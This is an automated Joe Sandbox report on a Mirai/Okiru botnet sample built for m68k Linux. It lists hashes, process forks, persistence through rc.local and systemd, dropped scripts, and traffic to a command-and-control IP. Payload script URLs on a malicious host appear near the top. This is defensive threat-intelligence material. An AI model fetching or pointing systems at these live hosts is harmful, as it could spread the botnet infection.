Linux
Analysis Report
m68k.nn.elf
Overview
General Information
Sample name: | m68k.nn.elf |
Analysis ID: | 1566065 |
MD5: | 080f762794ef7d9bbcc7112383c28322 |
SHA1: | f2710e2a716bca1e7ec06d10869886f339c92d52 |
SHA256: | ac0128fa7aa3859709ea886ea00f49700b414c16f9e210c0f020b47f0af708eb |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1566065 |
Start date and time: | 2024-12-01 10:05:35 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | m68k.nn.elf |
Detection: | MAL |
Classification: | mal80.spre.troj.evad.linELF@0/10@2/0 |
- VT rate limit hit for: http://94.156.227.233/
- VT rate limit hit for: http://94.156.227.233/curl.sh
- VT rate limit hit for: http://94.156.227.233/lol.sh
- VT rate limit hit for: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
Command: | /tmp/m68k.nn.elf |
PID: | 5444 |
Exit Code: | 139 |
Exit Code Info: | SIGSEGV (11) Segmentation fault invalid memory reference |
Killed: | False |
Standard Output: | |
Standard Error: | qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
- system is lnxubuntu20
- m68k.nn.elf New Fork (PID: 5457, Parent: 5444)
- m68k.nn.elf New Fork (PID: 5472, Parent: 5444)
- sh New Fork (PID: 5494, Parent: 5472)
- m68k.nn.elf New Fork (PID: 5516, Parent: 5444)
- sh New Fork (PID: 5518, Parent: 5516)
- m68k.nn.elf New Fork (PID: 5519, Parent: 5444)
- sh New Fork (PID: 5525, Parent: 5519)
- m68k.nn.elf New Fork (PID: 5526, Parent: 5444)
- m68k.nn.elf New Fork (PID: 5531, Parent: 5444)
- sh New Fork (PID: 5537, Parent: 5531)
- m68k.nn.elf New Fork (PID: 5539, Parent: 5444)
- sh New Fork (PID: 5544, Parent: 5539)
- m68k.nn.elf New Fork (PID: 5545, Parent: 5444)
- sh New Fork (PID: 5551, Parent: 5545)
- m68k.nn.elf New Fork (PID: 5552, Parent: 5444)
- udisksd New Fork (PID: 5455, Parent: 802)
- udisksd New Fork (PID: 5496, Parent: 802)
- systemd New Fork (PID: 5498, Parent: 5497)
- gnome-session-binary New Fork (PID: 5505, Parent: 1588)
- udisksd New Fork (PID: 5561, Parent: 802)
- udisksd New Fork (PID: 5637, Parent: 802)
- udisksd New Fork (PID: 5638, Parent: 802)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
Click to see the 1 entries |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Mkdir executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File: | Jump to dropped file | ||
Source: | File: | Jump to dropped file |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Manipulation |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 2 File and Directory Permissions Modification | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 2 Scripting | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Linux.Backdoor.Mirai |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.25 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
154.216.19.139 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | false | |
185.125.190.26 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
154.216.19.139 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
185.125.190.26 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
daisy.ubuntu.com | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
/etc/rc.local | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 120 |
Entropy (8bit): | 4.71023514082177 |
Encrypted: | false |
SSDEEP: | 3:KPJRXSC/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRlufoYZX48bbaaeXCO |
MD5: | 82FAEE159509BB5192AA520D95440C3D |
SHA1: | 66BA9BC025F6E90666F34A8E38EAA89B719B7DC8 |
SHA-256: | E7BAC6C0AFEE6CC2EB7C778318124C284367B83C9EF3D6F7DDF9AC38FCF2F990 |
SHA-512: | D63BE1C08A45D85EB6B3DB74A93F1A266E194729CEF8BDB136597C3E89B83C36B495E12ADF73CC24484210824BC5122F87714446B9D1584C9D6ED0C0220D7B1E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 400 |
Entropy (8bit): | 4.612244173377962 |
Encrypted: | false |
SSDEEP: | 12:QRkiMEXNxl8GPUJgjvMHK2FSuKN+dRRucSOyd3:vRGcISzhYOM3 |
MD5: | 42A0E283E013A117BA7E3D837377CF3E |
SHA1: | 6C5454636C1771F46A606C304DCE8B4AB80B566A |
SHA-256: | 1BB893683F5E24931B53216BEFA2506111E440E08ADA73924BE5BC6D93F69F90 |
SHA-512: | 7D60DF45AB791CEF8ED0511D8E1AA36575A58F7213A1A217CB1C51DCABCF7C594441980B4216C81D5027212866421DFADE6FFCEBEFF29E2D81B828A1B7BF2C2B |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 107 |
Entropy (8bit): | 4.6965251577946185 |
Encrypted: | false |
SSDEEP: | 3:TKH4vZKSC/ANFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8luzSXoZX48bzBeLXE0 |
MD5: | 75C3B0070571A42064490B0A59C5F54F |
SHA1: | 5E48FEB277032F0F45255EC98EC6FDDB9710180D |
SHA-256: | 3AAFF2180555B9691F8AECA6944ED2B5574D3612A0B4F91AE56A31DD30F3024B |
SHA-512: | FAE041568F54085F8E91E004C14F26B8DF19267AF398D26166947A9C70BD0BD67C36D02078BD7DFFD0AF924D35EEADFB14880757B78354DA9823C4003FEF50F6 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 112 |
Entropy (8bit): | 4.648300524622469 |
Encrypted: | false |
SSDEEP: | 3:nAWu58C/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:ANufoYZX48bbaaeXCO |
MD5: | 6B69B8EBA9149CE0E664318604481B1B |
SHA1: | 19EA18B050694AC87A05648235C7EE1BFD891815 |
SHA-256: | 0D26FFA18F7B01205E1A8852E5B2B964711987AE35A7A56F512239F67DBC2D0F |
SHA-512: | AAB12A8BD0B4D5F2970DCA2A2F7B1907F5DE8E68DC2B248CB04657D5F1FC7366E51A1F885ED31F64DD336698A0FF050729230BA4DF1CA860E7675C0F7526A746 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 53 |
Entropy (8bit): | 3.871459242626451 |
Encrypted: | false |
SSDEEP: | 3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e |
MD5: | 2BD9B4BE30579E633FC0191AA93DF486 |
SHA1: | 7D63A9BD9662E86666B27C1B50DB8E7370C624FF |
SHA-256: | 64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D |
SHA-512: | AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 103 |
Entropy (8bit): | 4.539325085623206 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgluzSXoZX48bbaaeXC0 |
MD5: | 107E2A66E888E012915B4359DF5B17B1 |
SHA1: | A532A61F6D10B765D29B63248E84877DF85BB76C |
SHA-256: | 395C5BF18A2B8360C8D63A43B7FF55712985F066F9789F9B166F2A39092F9055 |
SHA-512: | 6E2FC482B1AB8E3D7166F0A12A56464F071699FB2A110D98E9390822FA8994ABD40B1BA36566FA303FC68AAFB343AD6EA14CFD4EE6A42C9B275DCB94B1033A46 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 10 |
Entropy (8bit): | 3.121928094887362 |
Encrypted: | false |
SSDEEP: | 3:TKH4vn:hv |
MD5: | 3E2B31C72181B87149FF995E7202C0E3 |
SHA1: | BD971BEC88149956458A10FC9C5ECB3EB99DD452 |
SHA-256: | A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF |
SHA-512: | 543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 301 |
Entropy (8bit): | 5.089772238578568 |
Encrypted: | false |
SSDEEP: | 6:z8ifitRZAMzdK+xE02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdtd+GWRXY+GWRuO |
MD5: | 5F2DE4BB7CB64F4FF46C92FBBBD18206 |
SHA1: | E548D43460D28039B78C3BBB88FD906D47831FB1 |
SHA-256: | 53E1138FD67D03288BB94DD07128318C7FF79BFC504DA67BC00F10716F74D25A |
SHA-512: | 50E330A60E42EF795B2387E0296010AF2B3FEAE72EC09ED1F1E7E671B7A4EE30B097F30A428924C7AEE438EE0E6B1C8B6B8EBE60B8B685DB56EDD5942DED1D71 |
Malicious: | false |
Preview: |
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 17 |
Entropy (8bit): | 3.6168746059562227 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANln:TglOn |
MD5: | CF5BFD6A623ECC046218AA0EBA4D8FE7 |
SHA1: | E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88 |
SHA-256: | C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560 |
SHA-512: | F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.409741433474654 |
TrID: |
|
File name: | m68k.nn.elf |
File size: | 113'008 bytes |
MD5: | 080f762794ef7d9bbcc7112383c28322 |
SHA1: | f2710e2a716bca1e7ec06d10869886f339c92d52 |
SHA256: | ac0128fa7aa3859709ea886ea00f49700b414c16f9e210c0f020b47f0af708eb |
SHA512: | 74d9b2835fd6f144297bd5205c71afb3038f19f3eb18084f1d048a13c95ff6b5ee00253c801c832190c1fbc37b83949277b9232cd712c74e9305cba9c880f1d8 |
SSDEEP: | 3072:O6kRcZNCujikl/rfQj3kB20ny3izb4yYZvoy+vGKsyYCs:O6Sc7pjxl9AyYhx+vPsys |
TLSH: | A7B34AC7B401DEADFC1ED67B541B0A29B63473441F520B23A25BBDA7EDA21D8481AF81 |
File Content Preview: | .ELF.......................D...4.........4. ...(.................................. .......................((...... .dt.Q............................NV..a....da.....N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 112608 |
Section Header Size: | 40 |
Number of Section Headers: | 10 |
Header String Table Index: | 9 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80000094 | 0x94 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.text | PROGBITS | 0x800000a8 | 0xa8 | 0x184d6 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.fini | PROGBITS | 0x8001857e | 0x1857e | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.rodata | PROGBITS | 0x8001858c | 0x1858c | 0x2c44 | 0x0 | 0x2 | A | 0 | 0 | 2 |
.ctors | PROGBITS | 0x8001d1d4 | 0x1b1d4 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x8001d1dc | 0x1b1dc | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x8001d1e8 | 0x1b1e8 | 0x5b8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x8001d7a0 | 0x1b7a0 | 0x225c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x1b7a0 | 0x3e | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x80000000 | 0x80000000 | 0x1b1d0 | 0x1b1d0 | 6.4215 | 0x5 | R E | 0x2000 | .init .text .fini .rodata | |
LOAD | 0x1b1d4 | 0x8001d1d4 | 0x8001d1d4 | 0x5cc | 0x2828 | 5.0515 | 0x6 | RW | 0x2000 | .ctors .dtors .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 1, 2024 10:06:26.208173990 CET | 40280 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.328248978 CET | 199 | 40280 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.328309059 CET | 40280 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.330804110 CET | 40280 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.332143068 CET | 40280 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.336308956 CET | 40282 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.450757980 CET | 199 | 40280 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.456227064 CET | 199 | 40282 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.456269026 CET | 40282 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.458265066 CET | 40282 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.459585905 CET | 40282 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.467994928 CET | 40284 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.493092060 CET | 199 | 40280 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.578145981 CET | 199 | 40282 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.587973118 CET | 199 | 40284 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.588033915 CET | 40284 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.607052088 CET | 40284 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.609738111 CET | 40284 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.625063896 CET | 199 | 40282 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.639058113 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.726969957 CET | 199 | 40284 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.759087086 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.759155035 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.764604092 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.766041040 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.773111105 CET | 199 | 40284 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.774693966 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.884587049 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.894661903 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:26.894738913 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.899965048 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.902678967 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.906023979 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:26.929070950 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.019962072 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.025991917 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.026532888 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
